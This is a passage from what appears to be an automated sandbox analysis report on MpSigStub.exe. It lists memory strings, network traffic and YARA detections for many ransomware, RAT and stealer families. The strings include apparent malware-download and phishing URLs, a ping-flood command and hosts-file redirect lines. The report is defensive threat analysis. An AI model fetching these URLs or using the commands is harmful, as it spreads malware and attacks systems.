Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://www.sanlorenzoyacht.com/newsl/uploads/docs/43.dotm
Source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.slgroupsrl.com/vendo
Source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp String found in binary or memory: https://www.spectrumhosting.co.za/hello-3.wav
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://www.sugarsync.com/pf
Source: MpSigStub.exe, 00000023.00000003.18339677269.0000015B1AB04000.00000004.00000001.sdmp String found in binary or memory: https://www.teamviewer.com
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://www.tecel.cl/.well-known/frank/next.php
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://www.tecel.cl/content/ak/next.php
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: https://www.thegoodplan.ovh/promo.php
Source: RegAsm.exe, 00000008.00000002.21904007601.000000001E471000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: https://www.threadpaints.com/js/status.js
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://www.torproject.org/download/
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: https://www.tsuburaya-prod.co.jp/wp-content/plugins/wp-ogp/sa.exe
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://www.ultimateislandguide.com//cache/.p/next.php
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: https://www.upload.ee/
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://www.upload.ee/download/
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://www.vacsax.co.uk/wp-admin/mile/graceserver.php
Source: MpSigStub.exe, 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp String found in binary or memory: https://www.vespang.cf/ideshow/
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://www.vespang.cf/ideshow/post.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.yaplakal.com/go/?https://yothuful-lichretman-bboae1.netlify.app#juangondo
Source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp String found in binary or memory: https://www2.bancobrasil.com.br/
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://xf.zp-inwsice.online/?e=claire
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp String found in binary or memory: https://xmrig.com/docs/algorithms
Source: MpSigStub.exe, 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp String found in binary or memory: https://xmrig.com/wizard
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://xw.kh-imoice.online/?e=info
Source: MpSigStub.exe, 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp String found in binary or memory: https://y/ews/Exchange.asmx
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://yerl.org/
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: https://ygmservices.com/
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://yoga.webnatico.com/wp-admin/maint/msci.exe
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://youc1000.com/f.html#/ywxsaxnvbi5ly2tszxlay3nnas5jb20=
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://zangomart.com/soft/order/information/adobe2/index.htm
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://zerofatality.net/wp-includes/js/reportdhlnew.php
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://zerofatality.net/wp-includes/js/reportpdfnew.php
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://zerofatality.org/wp-admin/js/widgets/reportdhlnew.php
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://zk.fx-invoice.online/?e=info
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://zxc.amiralrouter.online/testxxxx.exe
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: RegAsm.exe, 00000008.00000002.21904829624.000000001E502000.00000004.00000001.sdmp String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.com/www.google.com/] equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: "http://www.youtube.com/watch?v=nqpod5at30g" equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: "https://www.facebook.com/login.php] equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: .src='http://www.facebook.com/plugins/like.php?href='+encodeuricomponent( equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: 4src='http://www.facebook.com/plugins/like.php?href equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: 4src='http://www.facebook.com/widgets/like.php?href equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: 67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: 67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: :127.0.0.1 www.login.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: <127.0.0.1 www.search.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: @FB_www.facebook.com/modz.ryan_ProtectedBy_RyanBorland_0x equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: @FB_www.facebook.com/modz.ryan_ProtectedBy_RyanBorland_0xx equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: G"http://www.youtube.com/watch?v=nqpod5at30g" equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp String found in binary or memory: Hping -t -w 1 -l 65500 www.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: YouTube http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: a67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: a67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: dc:\arquivos de programas\internet explorer\iexplore.exe http://www.youtube.com/watch?v=Vjp7vgj119s equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/s?wd=http://www.google.cn/search?hl=zh-CN&q=http://search.cn.yahoo.com/search?p=http://www.sogou.com/web?sogouhome=&shuru=shou&query=http://so.163.com/search.php?q= equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://www.rambler.ru/srch?set= equals www.rambler.ru (Rambler)
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000023.00000003.18344667874.0000015B1B06E000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com/watch?v= equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/login.php equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: src='http://www.facebook.com/plugins/like.php?href equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: src='http://www.facebook.com/widgets/like.php?href equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: www.hotmail.com equals www.hotmail.com (Hotmail)
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.com/ equals www.yahoo.com (Yahoo)
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1hKAWruhccvaKl722JOqs1briWjn1s8ks HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/g7dge6jvaanlcs7829hvlmboru4ioabe/1634024250000/16524389560697724177/*/1hKAWruhccvaKl722JOqs1briWjn1s8ks?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-28-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49793 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.33:443 -> 192.168.11.20:49794 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected LimeRAT
Source: Yara match File source: 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected LaZagne password dumper
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Linux EvilGnome RC5 key
Source: Yara match File source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected VBKeyloggerGeneric
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Creates a DirectInput object (often for capturing keystrokes)
Source: MpSigStub.exe, 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp Binary or memory string: DirectDrawCreateEx
Installs a raw input device (often for capturing keystrokes)
Source: MpSigStub.exe, 00000023.00000003.18288248948.0000015B1B1FB000.00000004.00000001.sdmp Binary or memory string: GetRawInputData
Yara detected Keylogger Generic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR

E-Banking Fraud:

barindex
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected RevengeRAT
Source: Yara match File source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Pony
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Njrat
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18293985930.0000015B1C0F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands:

barindex
Yara detected BlackMoon Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Ragnarok ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Globeimposter Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Avaddon Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected BLACKMatter Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Jigsaw
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected AESCRYPT Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Rapid ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected RansomwareGeneric
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Ouroboros ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Fiesta Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Lolkek Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Chaos Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected TeslaCrypt Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Mock Ransomware
Source: Yara match File source: 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Conti ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b59d455.123.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b59e859.148.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b59d455.107.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b59fe5d.109.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b59d455.149.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b59e859.122.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b59fe5d.121.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b59e859.108.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b59fe5d.150.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18330301023.0000015B1B598000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18316997643.0000015B1B598000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18338385554.0000015B1B3CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected NoCry Ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1c00879a.77.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected ByteLocker Ransomware
Source: Yara match File source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected RegretLocker Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Crypt ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Clop Ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b013bb2.54.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected LockBit ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected LOCKFILE ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Cerber ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1c00879a.77.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Rhino ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Niros Ransomware
Source: Yara match File source: 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Buran Ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected VHD ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Netwalker ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Jcrypt Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Delta Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected LazParking Ransomware
Source: Yara match File source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected GlobeLocker Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Zeppelin Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Apis Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Wannacry ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected MegaCortex Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Cobra Locker ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected RekenSom ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Babuk Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Nemty Ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
